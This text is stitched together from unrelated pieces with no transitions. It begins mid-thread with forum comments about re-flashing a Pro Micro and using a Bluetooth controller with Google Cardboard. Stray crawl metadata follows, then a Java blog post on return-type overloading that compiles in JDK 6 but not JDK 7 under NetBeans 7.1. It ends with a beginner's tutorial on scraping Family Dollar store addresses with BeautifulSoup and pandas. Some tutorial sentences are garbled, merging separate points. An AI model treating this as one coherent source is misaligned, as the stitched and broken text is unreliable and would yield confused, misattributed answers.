disconnect and re connect it starts on port 5 then when it reconnects it goes to port 6 and then errors out telling me there is no board on port 6 any ideas would help out greatly thanks Try setting the the board type in the IDE to Leonardo disconnect the usb first , change the board type and reconnect , then compile and upload. yup I got it working thanks I would like to thank everyone for your help I am a little rusty at this stuff Okey dokey , I definitely Bric'd da micro ... Sparkfun was good but confusing in places to follow. I finally just gave up and dug out my adafruit usbtiny. Soldered the header pins on the micro and stuck it in a breadboard , used the jumpers to pick up ISP connections to the USBtiny and selected programmer in the Arduino IDE and ran Bootloader , it burned fine My micro is restored If you are going to much with these Pro Micro's I'd suggest buying the USBtiny programmer which normally I use to load AVR programs. This month's documentation on how to use the box contents was pretty inadequate, I have to say. So are there iOS apps that work with this bluetooth remote? I can't believe that you'd ship a solution that only works with Android. It may only work for android though. It works fine on my galaxy s5. Solution Found: Start it up and pair, then turn the controller off. Hold X and start to turn it on again, when turned on this way, it defaults to MOUSE mode, the analog stick moves the cursor, the start button is a click (or double click) which WORKS with the cardboard apps. I've got the inertial mouse working on a bread board. I've been trying to get the bluetooth working with this breadboard, but I'm a little afraid I damaged the module, the bluetooth runs on 3.3V and the Tx line from the arduino is 5V. Didn'tread that until later. It pairs with my computer just fine but I don't see anything coming from the serial monitor. I recently tried setting up a voltage divider on the Tx line to drop it down around 3.3V but that didn't seem to have any effect. Next I'm going to take it all apart and just try talking to the bluetooth without the motion controller or any mouse functions. Stay tuned for that video. I like this hack. He just drills a hole so he can touch the screen. Easy! I have gotten my bluetooth controller to pair up fine with my iPhone 6s, but all the key functions in both "game" or "key" modes don't actually seem to work in the Google Cardboard app, or any of the games I have downloaded. I just opened mine up. I got the select button working with a magnet on the camera side of my iphone 6s. I really hope I can get a remote option like the gloves working as a selector, the magnet just seems too low tech or imprecise for me. I was much more impressed than I thought I would be just from the demo on the cardboard app. I'm very happy with this box it made me a little bit giddy when I opened it. I uploaded a video of my unboxing, check it out: I plan on doing another video for the glove project once I've got that done....success or failure. Mine came today. OMG! I didn't even know I wanted one of these!! Can't wait to start.
http://www.instructables.com/id/HackerBoxes-0009-Virtual-Worlds/
CC-MAIN-2017-43
refinedweb
4,646
61.67
Introduction In C++, lambda expression constructs a closure, an unnamed function object capable of capturing variables in scope. It still sounds ambiguous, at least to me. Closure is a general concept in programming that originated from functional programming. When we talk about the closures in C++, they always come with lambda expressions. In this blog post, we would take a look at an example for C++ lambda expression and closure, learn the difference between lambda expression and closure, and understand the concepts. Lambda Expression VS Closure The difference between the concepts of lambda expression and closure is sometimes confusing, since lambda expression and closure were talked about together all the time. Scott Meyers got a good explanation to this using analogues. ).” Examples /* * closure.cpp */ #include <iostream> #include <functional> std::function<void(void)> closureWrapper1() { int x = 10; return [x](){std::cout << "Value in the closure: " << x << std::endl;}; } std::function<void(void)> closureWrapper2() { int x = 10; return [&x](){x += 1; std::cout << "Value in the closure: " << x << std::endl;}; } int main() { int x = 10; auto func0 = [&x](){x += 1; std::cout << "Value in the closure: " << x << std::endl;}; std::function<void(void)> func1 = closureWrapper1(); std::function<void(void)> func2 = closureWrapper2(); func0(); func0(); func0(); std::cout << "-------------------------" << std::endl; func1(); func1(); func1(); std::cout << "-------------------------" << std::endl; func2(); func2(); func2(); } To compile the program, please run the following command in the terminal. $ g++ closure.cpp -o closure --std=c++11 The outputs are as follows on my computer. $ ./closure Value in the closure: 11 Value in the closure: 12 Value in the closure: 13 ------------------------- Value in the closure: 10 Value in the closure: 10 Value in the closure: 10 ------------------------- Value in the closure: 32765 Value in the closure: 32766 Value in the closure: 32767 In the above example, func1 and func2 are not closures. Instead, they are std::function wrapper objects that wrapped closures. func0 is a closure, but it should be a copy of the closure created by the lambda expression [&x](){x += 1; std::cout << "Value in the closure: " << x << std::endl;}. In the func0, it captured the reference to the variable x in the scope of main. Therefore, every time we call func0, the value of x in the scope of main gets increased by 1. In the func1, it captured the value of the variable x in the scope of closureWrapper1 by making a copy of it. Therefore, every time we call func1, the value of of the closure is always 10. Note that after returning from the ordinary function, the local variables in the ordinary function would be out of scope. In the func2, it captured the reference to the variable x in the scope of closureWrapper2. The reference “remember” the address of x. However, after returning from the function, the local variable x in the ordinary function would be out of scope. Then the value of reference would be undefined. Closure Analogs Function Object (Functor) Function object overload the operator(). It could capture the values by making a copy of the variables to its member variables. The shortcoming is that for each different function call, regardless of how simple it is, we would have to implement a new class, whereas implementing a lambda expression is faster. Functions Using Static Variables We don’t actually like to use static variables in the function, unless it is extremely necessary, because it would confuse the readers. In addition, if you have a lot of function calls, it is likely that we have a lot of static variables which is more undesired. FAQs Is Function Object Closure? No. According to the definition of closure, “In programming languages, a closure, also lexical closure or function closure, is a technique for implementing lexically scoped name binding in a language with first-class functions”. As C++ does not allow defining functions and objects inside a function, function object does not (always) allow lexical scoping, where with lexical scope, a name always refers to its (more or less) local lexical environment. In our case, x in the closure has always to be mapped to the x in the local scope. In a function object, the member variables are different from the local variables outside the function object, even though they might have the same name. This might look like a lexical scoping exception for function objects in C++. #include <iostream> #include <functional> double pi = 3.1415926; class CircleArea { public: CircleArea() { } double operator() (double r) const { return pi * r * r; } }; int main() { double r = 1.0; CircleArea circleArea; double area = circleArea(r); std::cout << area << std::endl; } However, because we are not allowed to define a class in all the other scopes, class is not considered to support lexical scoping. The only nested functions allowed in C++ are lambda expression. Conclusion When we talked about the closures in C++, they are basically referring to the objects that lambda expressions constructed.
https://leimao.github.io/blog/CPP-Closure/
CC-MAIN-2021-25
refinedweb
813
58.72
::rect -> :user/rect Clojure eschews the traditional object-oriented approach of creating a new data type for each new situation, instead preferring to build a large library of functions on a small set of types. However, Clojure fully recognizes the value of runtime polymorphism in enabling flexible and extensible system architecture. Clojure supports sophisticated runtime polymorphism through a multimethod system that supports dispatching on types, values, attributes and metadata of, and relationships between, one or more arguments. A Clojure multimethod is a combination of a dispatching function, and one or more methods. When a multimethod is defined, using defmulti, a dispatching function must be supplied. This function will be applied to the arguments to the multimethod in order to produce a dispatching value. The multimethod will then try to find the method associated with the dispatching value or a value from which the dispatching value is derived. If one has been defined (via defmethod), it will then be called with the arguments and that will be the value of the multimethod call. If no method is associated with the dispatching value, the multimethod will look for a method associated with the default dispatching value (which defaults to :default), and will use that if present. Otherwise the call is an error. creates these relationships, and the isa? function tests for their existence. Note that isa? is not instance?. You can define hierarchical relationships with (derive child parent). Child and parent can be either symbols or keywords, and must be namespace-qualified: Note the :: reader syntax, ::keywords resolve namespaces. ::rect -> :user/rect (derive ::rect ::shape) (derive ::square ::rect) parents / ancestors / descendants and isa? let you query the hierarchy (parents ::rect) -> #{:user/shape} (ancestors ::square) -> #{:user/rect :user/shape} (descendants ::shape) -> #{:user/rect :user/square} (= x y) implies (isa? x y) (isa? 42 42) -> true isa? uses the hierarchy system (isa? ::square ::shape) -> true You can also use a class as the child (but not the parent, the only way to make something the child of a class is via Java inheritance). This allows you to superimpose new taxonomies on the existing Java class hierarchy: (derive java.util.Map ::collection) (derive java.util.Collection ::collection) (isa? java.util.HashMap ::collection) -> true (isa? String Object) -> true as do parents / ancestors (but not descendants, since class descendants are an open set) (ancestors java.util.ArrayList) -> #{java.lang.Cloneable java.lang.Object java.util.List java.util.Collection java.io.Serializable java.util.AbstractCollection java.util.RandomAccess java.util.AbstractList} (isa? [::square ::rect] [::shape ::shape]) -> true Multimethods use isa? rather than = when testing for dispatch value matches. Note that the first test of isa? is =, so exact matches work. (defmulti foo class) (defmethod foo ::collection [c] :a-collection) (defmethod foo String [s] :a-string) (foo []) :a-collection (foo (java.util.HashMap.)) :a-collection (foo "bar") :a-string prefer-method is used for disambiguating in case of multiple matches where neither dominates the other. You can just declare, per multimethod, that one dispatch value is preferred over another: All of the examples above use the global hierarchy used by the multimethod system, but entire independent hierarchies can also be created with make-hierarchy, and all of the above functions can take an optional hierarchy as a first argument. This simple system is extremely powerful. One way to understand the relationship between Clojure multimethods and traditional Java-style single dispatch is that single dispatch is like a Clojure multimethod whose dispatch function calls getClass on the first argument, and whose methods are associated with those classes. Clojure multimethods are not hard-wired to class/type, they can be based on any attribute of the arguments, on multiple arguments, can do validation of arguments and route to error-handling methods etc. Note: In this example, the keyword :Shape is being used as the dispatch function, as keywords are functions of maps, as described in the Data Structures section. (defmulti area :Shape) (defn rect [wd ht] {:Shape :Rect :wd wd :ht ht}) (defn circle [radius] {:Shape :Circle :radius radius}) (defmethod area :Rect [r] (* (:wd r) (:ht r))) (defmethod area :Circle [c] (* (. Math PI) (* (:radius c) (:radius c)))) (defmethod area :default [x] :oops) (def r (rect 4 13)) (def c (circle 12)) (area r) -> 52 (area c) -> 452.3893421169302 (area {}) -> :oops
https://clojure.org/reference/multimethods
CC-MAIN-2017-39
refinedweb
710
55.03
> From: Dominique Devienne [mailto:DDevienne@lgc.com] > > > From: Jose Alberto Fernandez [mailto:jalberto@cellectivity.com] > > > From: Dominique Devienne [mailto:DDevienne@lgc.com] > > > > From: Stefan Bodewig [mailto:bodewig@apache.org] > > > 1) I don't like the <let> name. Perhaps it shows how ignorant I am > > > about other languages not in the C family, but it doesn't speak > > > to me, and the name to not convey the purpose. Thus I'm -1 to > > > the <let> name. <scope> or <local> or else are not perfect, but > > > at least convey more meaning to my ignorant self. > > > > :-(. <let> comes from mathematics. > > Maybe in your part of the world... > Well the last I checked, in english, when you write a definition, or a proof, or a theorem, or whatever. You ussually start with something like: "Let G(V,E) be a graph, and let X be a person trying to understand the concept of a graph. The ability of X to understand what G means is ...." :-) Now, X is just a moniker, it is not a person. In my next definition X may stand for something else. Very simillar to what <let/> does. Now, maybe in a different language you use a different construction. But that is not the point, is it. In any case, the argument is about the concept of defining a name and not a location. > > That is the reason for using <let>, it is also used in some > functonal > > languages. > > I though so. I'm still -1, or at best -0 > if I hear more convincing arguments. > > > The scope, is the scope of the attribute notation (i.e., the > macrodef). > > Now you can use this name to create a new property, using > <property/> > > or to watever else you please, there are no expectation whatsoever. > > I'm not following. I think I understand what a scope is. > I don't confuse scope for the notation to define explicitly > what should 'go out of scope' when the explicit scope ends. > > I consider running a <macrodef> as starting/entering a new > scope for names, doing something, then ending/leaving the > scope, restoring shadowed properties and removing local > properties, as defined by the propertyset. > > > And I have mentioned several times that one could use > propertysets to > > stop things leaking through <antcalls> and such. But you are still > > thinking only on properties. There are other things that we create > > dynamically in ANT. Like references, scripts, etc. > > Not at all. I'm thinking properties and references. What else > is there? Scripts are scripts, id'd or not. That's still references. > > > The main hurdle is that ANT uses a flat namespace for > things and that > > anypart can see any property/reference defined by any other part > at > > any time on the life of the project. > > So? As Peter points out, a flat namespace doesn't mean it > cannot be implemented using a stack of maps per scope, > similar the nesting of Properties when you provide a default. > It's still flat, but uses nested Properties to provide > correct compartimentation. This is how <antcall> should have > been implemented instead of the copy going on right now. > Do not confuse "names" with "namespaces". Names may be flat, but if you have a stack of maps, you definetly do not have a flat namespace. Same applies for "C", and does not applies for Fortran. > > I know they are very old concepts here, but just as old are > the data > > structures we used in ANT. And on top, the fact that something does > not > > exist is meaningful (i.e., unless) I do not see how you can > reconcile > > all this things. Maybe this should be done as part of ANT > 2.0 (joke). > > And forget about BC, > > Sorry, but I still don't see why it can't be made BC... The > Project API has to be unchanged of course, but the actual > impl should move to a lighter weight Context object or > something that would be stacked correctly, and to which > Project would delegate to. > As long as you do not change the meaning or behavior of <tasks/> INCLUDING third party tasks that we cannot go and change. We have a contract with people writing tasks. If we want to break it we should move to ANT 2.0 and have to development lines. > Dealing with <parallel> would be tricky, but I think we > *should* break BC by not allowing the different 'threads' of > a <parallel> to share properties, at least unless explicitly > requested. > So what do you do about <waitfor/> ? It is there for a reason. > But that's going into too much detail for now. --DD The details is what is important here. Jose Alberto --------------------------------------------------------------------- To unsubscribe, e-mail: dev-unsubscribe@ant.apache.org For additional commands, e-mail: dev-help@ant.apache.org
http://mail-archives.apache.org/mod_mbox/ant-dev/200410.mbox/%3CF3D701FEF0483B4AAA11A18CE328461B07824B@leeds.cellectivity.com%3E
CC-MAIN-2014-49
refinedweb
796
75.91
- NAME - SYNOPSIS - DESCRIPTION - WHAT'S NEW? - Using the Inline::Python Module - Exceptions - Using Perl inside Python (inside Perl) - Using the PerlPkg Type - Using the PerlSub Type - Under the Hood - The Do-it-yourselfer's Guide to Inline::Python - SEE ALSO - BUGS AND DEFICIENCIES - SUPPORTED PLATFORMS -. This document describes Inline::Python, the Perl package which gives you access to a Python interpreter. For lack of a better place to keep it, it also gives you instructions on how to use perlmodule, the Python package which gives you access to the Perl interpreter. to'. Importing Functions Maybe you have a whole library written in Python that only needs one entry point. You'll want to import that function. It's as easy as this: use Inline Python; doit(); __END__ __Python__ from mylibrary import doit Inline::Python actually binds to every function in Python's "global" namespace (those of you in the know, know that namespace is called '__main__'). So if you had another function there, you'd get that too. Importing Classes If you've written a library in Python, you'll make it object-oriented. That's just something Python folks do. So you'll probably want to import a class, not a function. That's just as easy: use Inline Python; my $obj = new Myclass; __END__ __Python__ from mylibrary import myclass as Myclass New-Style Classes As of python 2.2, the python internals have begun to change in a way which makes types 'look' more like classes. This means that your python code can now subclass builtin python types such as lists, tuples, integers, and etc. It also means that identifying python objects and creating Perl bindings for them has become a little trickier. See Guido's write-up () and the relevant Python Enhancement Proposals (PEP) numbers 252 and 253 for details about the python code. Also, see the mailing-list discussion () for possible implications regarding C-language python extensions. This change should not affect code which uses Inline::Python, except that it allows you to bind to python classes which have been written using these new features. In most cases, you will be importing an entire class from an external library as defined in the example above. In other cases, you may be writing Inline::Python code as follows: use Inline Python => <<'END'; class Foo(object): def __init__(self): print "new Foo object being created" self.data = {} def get_data(self): return self.data def set_data(self,dat): self.data = dat END Additional caveats may exist. Note that if the python class is subclassing one of the builtin types which would normally be accessible as a 'Perlish' translation, that the instance will be an opaque object accessible only through its class methods. # Class is defined as 'def Class(float):' my $obj = Class->new(4); print $$obj "\n"; # will NOT print '4.0' New-Style Boundary Conditions(); In this example, Bar isn't imported because it isn't a global -- it's hidden inside the function Foo(). But Foo() is imported into Perl, and it returns an instance of the Bar class. What happens then? Whenever Inline::Python needs to return an instance of a class to Perl, it generates an instance of Inline::Python::Object, the base class for all Inline::Python objects. This base class knows how to do all the things you need: calling methods, in this case. Exceptions Exceptions thrown in Python code get translated to Perl exceptions which you can catch using eval. Using Perl inside Python (inside Perl). The perl package exposes Perl packages and subs. It uses the same code as Inline::Python to automatically translate parameters and return values as needed. Packages and subs are represented as PerlPkg and PerlSub, respectively. Using the PerlPkg Type() eval(source code) Unlike Python, Perl has no exec() -- the eval() function always returns the result of the code it evaluated. eval() takes exactly one argument, the perl source code, and returns the result of the evaluation. require() and use() require(module name) use(module name) Use require() instead of import. In Python, you'd say this:: __getattr__ Python's __getattr__() function allows the package to dynamically return something to satisfy the request. For instance, you can get at the subs in a perl package by using dir() (which is the same as When Inline::Python imports a class or function, it creates subs in Perl which delegate the action to some C functions I've written, which know how to call Python functions and methods. use Inline Python => <<'END'; class Foo: def __init__(self): print "new Foo object being created" self.data = {} def get_data(self): return self.data def set_data(self,dat): self.data = dat END Inline::Python actually generates this code and eval()s; } sub __init__ { splice @_, 1, 0, "__init__"; return &Inline::Python::py_call_method; } More about those py_* functions, and how to generate this snippet of code yourself, in the next section. The Do-it-yourselfer's Guide to Inline::Python END my $o = Inline::Python::Object->new('__main__', 'MyClass'); $o->put("candy", "yummy"); die "Ooops" unless $o->get("candy") eq 'yummy'; Inline::Python provides a full suite of exportable functions you can use to manipulate Python objects and functions "directly". py_eval()); py_eval(<<'END'); def Foo(): return 42 END #_eval(<<'END'); class Foo: def __init__(self): print "new Foo object being created" self.data = {} def get_data(self): return self.data def set_data(self,dat): self.data = dat END py_bind_class("main::Foo", "__main__", "Foo", "set_data", "get_data"); my $o = new Foo; This call to py_bind_class() will generate this code and eval(); } inheritance tree to the AUTOLOAD method. I recommend binding to the functions you know about, especially if you're the one writing the code. If it's auto-generated, use py_study_package(), described below. py_study_package() 11.4. It may work on older versions but will almost certainly not work with Python 3. AUTHOR Neil Watkiss <NEILW@cpan.org> Brian Ingerson <INGY@cpan.org> is the author of Inline, Inline::C and Inline::CPR. He was responsible for much encouragement and many suggestions throughout the development of Inline::Python. Eric Wilhelm provided support for 'new-style' classes in version 0.21. Many thanks, Eric! Stefan Seifert <NINE@cpan.org> fixed some bugs and is current co-maintainer. All Rights Reserved. This module is free software. It may be used, redistributed and/or modified under the same terms as Perl itself. (see) 2 POD Errors The following errors were encountered while parsing the POD: - Around line 477: Expected text after =item, not a number - Around line 482: Expected text after =item, not a number
https://metacpan.org/pod/release/NINE/Inline-Python-0.43/Python.pm
CC-MAIN-2017-04
refinedweb
1,096
64.2
I was first exposed to Java after several years of C++ experience and so it seemed natural when I learned that Java does not allow method overloading based on return type. The Defining Methods section of the Classes and Objects lesson in the Java Language Tutorial states, "The compiler does not consider return type when differentiating methods, so you cannot declare two methods with the same signature even if they have a different return type." Indeed, as Vinit Joglekar has pointed out, "It is an accepted fact that Java does not support return-type-based method overloading." The StackOverflow thread Java - why no return type based method overloading? explains why this is the case in Java. Given this, I was surprised when a colleague showed me a code snippet with two overloaded methods with the same runtime signature that compiled in JDK 6 as long as the return types differed. The following class compiles successfully with JDK 6, but not with JDK 7.Compiles in JDK 6 But Not in JDK 7 package examples.dustin; import java.util.Collection; /** * Simple example that breaks in Java SE 7, but not in Java SE 6. * * @author Dustin */ public class Main { public static String[] collectionToArray(final Collection<String> strings) { return new String[] { "five" }; } public static int[] collectionToArray(final Collection<Integer> integers) { return new int[] { 5 }; } /** * Main function. * * @param arguments The command line arguments; none expected. */ public static void main(String[] arguments) { } } As described in Angelika Langer's What Is Method Overloading?, the above code should not compile. It doesn't in Java SE 7. In NetBeans 7.1, it doesn't. Or, more properly, it's a mixed bag. As the screen snapshot below demonstrates, NetBeans 7.1 builds the source code above fine as shown in the Output Window when the version of Java associated with the project is Java SE 6. However, the NetBeans editor shows the red squiggly lines indicating compiler error. The next image shows what the error message is. Although NetBeans 7.1 is able to build the code shown above when it's part of a project associated with Java SE 6 (Update 31 in this case), the code editor still reports the error shown above. This is because NetBeans uses a different version of the Java compiler internally than the one explicitly associated with the project being edited. If I change the version of Java associated with the NetBeans project for the source code above, it will no longer build in NetBeans. This is shown next. There are a couple interesting things about this bug. First, the fact that this code compiles fine in Java SE 6 but is addressed and does not compile in Java SE 7 means that it is possible for code working in Java SE 6 to not work when the code base is moved to Java SE 7. I downloaded the latest version of JDK 6 available (Java SE 6 Update 31) and confirmed the original code shown above still builds in Java SE 6. It does not build in Java SE 7. There are other versions of the code above that do not build in Java SE 6 or in Java SE 7. For example, if the code above is changed so that the methods return the same type, the code doesn't build even in Java SE 6. Similarly, if the Collection parameters to the two overloaded methods include a "raw" Collection (no parameterized type), it won't compile in Java SE 6 either. Of course, even if the return types are different, if the same Collection parameterized types are passed to both overloaded methods, even Java SE 6 won't compile this. These three situation are depicted in the following three screen snapshots. The code that builds in Java SE 6 but not in Java SE 7 needs to have overloaded methods that differ in both return types and in terms of the parameterized types of the collections that make up their method parameters. It doesn't matter if a given return type matches or is related to the parameterized type of the method's parameter as long as they differ. If the return types are the same, Java SE 6 detects a compiler error. Java SE 6 also detects the error if the erased parameters boil down to the same collection after erasure and the return types are not different. A second interesting thing about this bug is how its handled in NetBeans. Because NetBeans use its own internal compiler that does not necessarily match the version of the compiler that the developer has associated the IDE project to, you can run into situations like this where the code actually builds in the IDE, but the IDE's functionality such as code editors and project browsers indicate the code breaking. Because NetBeans 7.1 uses its own internal Java compiler for the code editor, one might wonder if this means Java 7 features could be sneaked in and would work in the IDE but then would not build when attempted from the command line or when explicitly built in the IDE. The next screen snapshot demonstrates why that is not the case. In that snapshot, a Java 7 specific feature is in the code and NetBeans 7.1 properly warns that this is not compatible with the Java 1.6 source setting. Bug 6182950 (methods clash algorithm should not depend on return type) has addressed the issue in JDK 7, but not in JDK 6. A related bug is Bug 6730568 ("Type erasure affects return types + type parameters"). Three additional references that provide sufficiently more background details are two StackOverflow threads (Differing behaviour between Java 5 & 6 when overloading generic methods and What is the concept of erasure in generics in java?) and the Java Tutorial entry on Type Erasure. The colleague who showed me this issue realized its existence because NetBeans 7.1 reported the "name clash ... have the same erasure" even when he was working with Java SE 6 code. This discovery was "accidental" due to the newer version of NetBeans using Java SE 7 compiler internally, but he welcomed the opportunity to fix the issue now rather than when he migrates to Java SE 7. I found this issue worth posting a blog post on because it provides a warning about a bug that may already be in some Java SE 6 code bases but will be made all too evident when the code base is moved to Java SE 7. I also posted this because I think it's important to be aware that modern versions of NetBeans use an internal compiler that may be of a different version than the compiler the developer has explicitly associated with his or her NetBeans project. 1 comment: Hi Dustin, That is very interesting. I understand that since you are passing in generic types to the method signature, the type erasures also had a bug which let code like this compile in JDK6 (based on my rustic memory). it is however completely fixed in Java7. -Sathya
http://marxsoftware.blogspot.com/2012/03/netbeans-71s-internal-compiler-and-jdk.html
CC-MAIN-2016-36
refinedweb
1,180
60.75
Get the highlights in your inbox every week. A beginner's guide to web scraping with Python | Opensource.com A beginner's guide to web scraping with Python Get some hands-on experience with essential Python tools to scrape complete HTML sites. Subscribe now There are plenty of great books to help you learn Python, but who actually reads these A to Z? (Spoiler: not me).Many people find instructional books useful, but I do not typically learn by reading a book front to back. I learn by doing a project, struggling, figuring some things out, and then reading another book. So, throw away your book (for now), and let's learn some Python. What follows is a guide to my first scraping project in Python. It is very low on assumed knowledge in Python and HTML. This is intended to illustrate how to access web page content with Python library requests and parse the content using BeatifulSoup4, as well as JSON and pandas. I will briefly introduce Selenium, but I will not delve deeply into how to use that library—that topic deserves its own tutorial. Ultimately I hope to show you some tricks and tips to make web scraping less overwhelming. Installing our dependencies All the resources from this guide are available at my GitHub repo. If you need help installing Python 3, check out the tutorials for Linux, Windows, and Mac. $ python3 -m venv $ source venv/bin/activate $ pip install requests bs4 pandas If you like using JupyterLab, you can run all the code using this notebook. There are a lot of ways to install JupyterLab, and this is one of them: # from the same virtual environment as above, run: $ pip install jupyterlab Setting a goal for our web scraping project Now we have our dependencies installed, but what does it take to scrape a webpage? Let's take a step back and be sure to clarify our goal. Here is my list of requirements for a successful web scraping project. - We are gathering information that is worth the effort it takes to build a working web scraper. - We are downloading information that can be legally and ethically gathered by a web scraper. - We have some knowledge of how to find the target information in HTML code. - We have the right tools: in this case, it's the libraries BeautifulSoup and requests. - We know (or are willing to learn) how to parse JSON objects. - We have enough data skills to use pandas. A comment on HTML: While HTML is the beast that runs the Internet, what we mostly need to understand is how tags work. A tag is a collection of information sandwiched between angle-bracket enclosed labels. For example, here is a pretend tag, called "pro-tip": <pro-tip> All you need to know about html is how tags work </pro-tip> We can access the information in there ("All you need to know…") by calling its tag "pro-tip." How to find and access a tag will be addressed further in this tutorial. For more of a look at HTML basics, check out this article. What to look for in a web scraping project Some goals for gathering data are more suited for web scraping than others. My guidelines for what qualifies as a good project are as follows. There is no public API available for the data. It would be much easier to capture structured data through an API, and it would help clarify both the legality and ethics of gathering the data. There needs to be a sizable amount of structured data with a regular, repeatable format to justify this effort. Web scraping can be a pain. BeautifulSoup (bs4) makes this easier, but there is no avoiding the individual idiosyncrasies of websites that will require customization. Identical formatting of the data is not required, but it does make things easier. The more "edge cases" (departures from the norm) present, the more complicated the scraping will be. Disclaimer: I have zero legal training; the following is not intended to be formal legal advice. On the note of legality, accessing vast troves of information can be intoxicating, but just because it's possible doesn't mean it should be done. There is, thankfully, public information that can guide our morals and our web scrapers. Most websites have a robots.txt file associated with the site, indicating which scraping activities are permitted and which are not. It's largely there for interacting with search engines (the ultimate web scrapers). However, much of the information on websites is considered public information. As such, some consider the robots.txt file as a set of recommendations rather than a legally binding document. The robots.txt file does not address topics such as ethical gathering and usage of the data. Questions I ask myself before beginning a scraping project: - Am I scraping copyrighted material? - Will my scraping activity compromise individual privacy? - Am I making a large number of requests that may overload or damage a server? - Is it possible the scraping will expose intellectual property I do not own? - Are there terms of service governing use of the website, and am I following those? - Will my scraping activities diminish the value of the original data? (for example, do I plan to repackage the data as-is and perhaps siphon off website traffic from the original source)? When I scrape a site, I make sure I can answer "no" to all of those questions. For a deeper look at the legal concerns, see the 2018 publications Legality and Ethics of Web Scraping by Krotov and Silva and Twenty Years of Web Scraping and the Computer Fraud and Abuse Act by Sellars. Now it's time to scrape! After assessing the above, I came up with a project. My goal was to extract addresses for all Family Dollar stores in Idaho. These stores have an outsized presence in rural areas, so I wanted to understand how many there are in a rather rural state. The starting point is the location page for Family Dollar. To begin, let's load up our prerequisites in our Python virtual environment. The code from here is meant to be added to a Python file (scraper.py if you're looking for a name) or be run in a cell in JupyterLab. import requests # for making standard html requests from bs4 import BeautifulSoup # magical tool for parsing html data import json # for parsing data from pandas import DataFrame as df # premier library for data organization Next, we request data from our target URL. page = requests.get("") soup = BeautifulSoup(page.text, 'html.parser') BeautifulSoup will take HTML or XML content and transform it into a complex tree of objects. Here are several common object types that we will use. - BeautifulSoup—the parsed content - Tag—a standard HTML tag, the main type of bs4 element you will encounter - NavigableString—a string of text within a tag - Comment—a special type of NavigableString There is more to consider when we look at requests.get() output. I've only used page.text() to translate the requested page into something readable, but there are other output types: - page.text() for text (most common) - page.content() for byte-by-byte output - page.json() for JSON objects - page.raw() for the raw socket response (no thank you) I have only worked on English-only sites using the Latin alphabet. The default encoding settings in requests have worked fine for that. However, there is a rich internet world beyond English-only sites. To ensure that requests correctly parses the content, you can set the encoding for the text: page = requests.get(URL) page.encoding = 'ISO-885901' soup = BeautifulSoup(page.text, 'html.parser') Taking a closer look at BeautifulSoup tags, we see: - The bs4 element tag is capturing an HTML tag - It has both a name and attributes that can be accessed like a dictionary: tag['someAttribute'] - If a tag has multiple attributes with the same name, only the first instance is accessed. - A tag's children are accessed via tag.contents. - All tag descendants can be accessed with tag.contents. - You can always access the full contents as a string with: re.compile("your_string") instead of navigating the HTML tree. Determine how to extract relevant content Warning: this process can be frustrating. Extraction during web scraping can be a daunting process filled with missteps. I think the best way to approach this is to start with one representative example and then scale up (this principle is true for any programming task). Viewing the page's HTML source code is essential. There are a number of ways to do this. You can view the entire source code of a page using Python in your terminal (not recommended). Run this code at your own risk: print(soup.prettify()) While printing out the entire source code for a page might work for a toy example shown in some tutorials, most modern websites have a massive amount of content on any one of their pages. Even the 404 page is likely to be filled with code for headers, footers, and so on. It is usually easiest to browse the source code via View Page Source in your favorite browser (right-click, then select "view page source"). That is the most reliable way to find your target content (I will explain why in a moment). In this instance, I need to find my target content—an address, city, state, and zip code—in this vast HTML ocean. Often, a simple search of the page source (ctrl + F) will yield the section where my target location is located. Once I can actually see an example of my target content (the address for at least one store), I look for an attribute or tag that sets this content apart from the rest. It would appear that first, I need to collect web addresses for different cities in Idaho with Family Dollar stores and visit those websites to get the address information. These web addresses all appear to be enclosed in a href tag. Great! I will try searching for that using the find_all command: dollar_tree_list = soup.find_all('href') dollar_tree_list Searching for href did not yield anything, darn. This might have failed because href is nested inside the class itemlist. For the next attempt, search on item_list. Because "class" is a reserved word in Python, class_ is used instead. The bs4 function soup.find_all() turned out to be the Swiss army knife of bs4 functions. dollar_tree_list = soup.find_all(class_ = 'itemlist') for i in dollar_tree_list[:2]: print(i) Anecdotally, I found that searching for a specific class was often a successful approach. We can learn more about the object by finding out its type and length. type(dollar_tree_list) len(dollar_tree_list) The content from this BeautifulSoup "ResultSet" can be extracted using .contents. This is also a good time to create a single representative example. example = dollar_tree_list[2] # a representative example example_content = example.contents print(example_content) Use .attr to find what attributes are present in the contents of this object. Note: .contents usually returns a list of exactly one item, so the first step is to index that item using the bracket notation. example_content = example.contents[0] example_content.attrs Now that I can see that href is an attribute, that can be extracted like a dictionary item: example_href = example_content['href'] print(example_href) Putting together our web scraper All that exploration has given us a path forward. Here's the cleaned-up version of the logic we figured out above. city_hrefs = [] # initialise empty list for i in dollar_tree_list: cont = i.contents[0] href = cont['href'] city_hrefs.append(href) # check to be sure all went well for i in city_hrefs[:2]: print(i) The output is a list of URLs of Family Dollar stores in Idaho to scrape. That said, I still don't have address information! Now, each city URL needs to be scraped to get this information. So we restart the process, using a single, representative example. page2 = requests.get(city_hrefs[2]) # again establish a representative example soup2 = BeautifulSoup(page2.text, 'html.parser') The address information is nested within type= "application/ld+json". After doing a lot of geolocation scraping, I've come to recognize this as a common structure for storing address information. Fortunately, soup.find_all() also enables searching on type. arco = soup2.find_all(type="application/ld+json") print(arco[1]) The address information is in the second list member! Finally! I extracted the contents (from the second list item) using .contents (this is a good default action after filtering the soup). Again, since the output of contents is a list of one, I indexed that list item: arco_contents = arco[1].contents[0] arco_contents Wow, looking good. The format presented here is consistent with the JSON format (also, the type did have "json" in its name). A JSON object can act like a dictionary with nested dictionaries inside. It's actually a nice format to work with once you become familiar with it (and it's certainly much easier to program than a long series of RegEx commands). Although this structurally looks like a JSON object, it is still a bs4 object and needs a formal programmatic conversion to JSON to be accessed as a JSON object: arco_json = json.loads(arco_contents) type(arco_json) print(arco_json) In that content is a key called address that has the desired address information in the smaller nested dictionary. This can be retrieved thusly: arco_address = arco_json['address'] arco_address Okay, we're serious this time. Now I can iterate over the list store URLs in Idaho: locs_dict = [] # initialise empty list for link in city_hrefs: locpage = requests.get(link) # request page info locsoup = BeautifulSoup(locpage.text, 'html.parser') # parse the page's content locinfo = locsoup.find_all(type="application/ld+json") # extract specific element loccont = locinfo[1].contents[0] # get contents from the bs4 element set locjson = json.loads(loccont) # convert to json locaddr = locjson['address'] # get address locs_dict.append(locaddr) # add address to list Cleaning our web scraping results with pandas We have loads of data in a dictionary, but we have some additional crud that will make reusing our data more complex than it needs to be. To do some final data organization steps, we convert to a pandas data frame, drop the unneeded columns "@type" and "country"), and check the top five rows to ensure that everything looks alright. locs_df = df.from_records(locs_dict) locs_df.drop(['@type', 'addressCountry'], axis = 1, inplace = True) locs_df.head(n = 5) 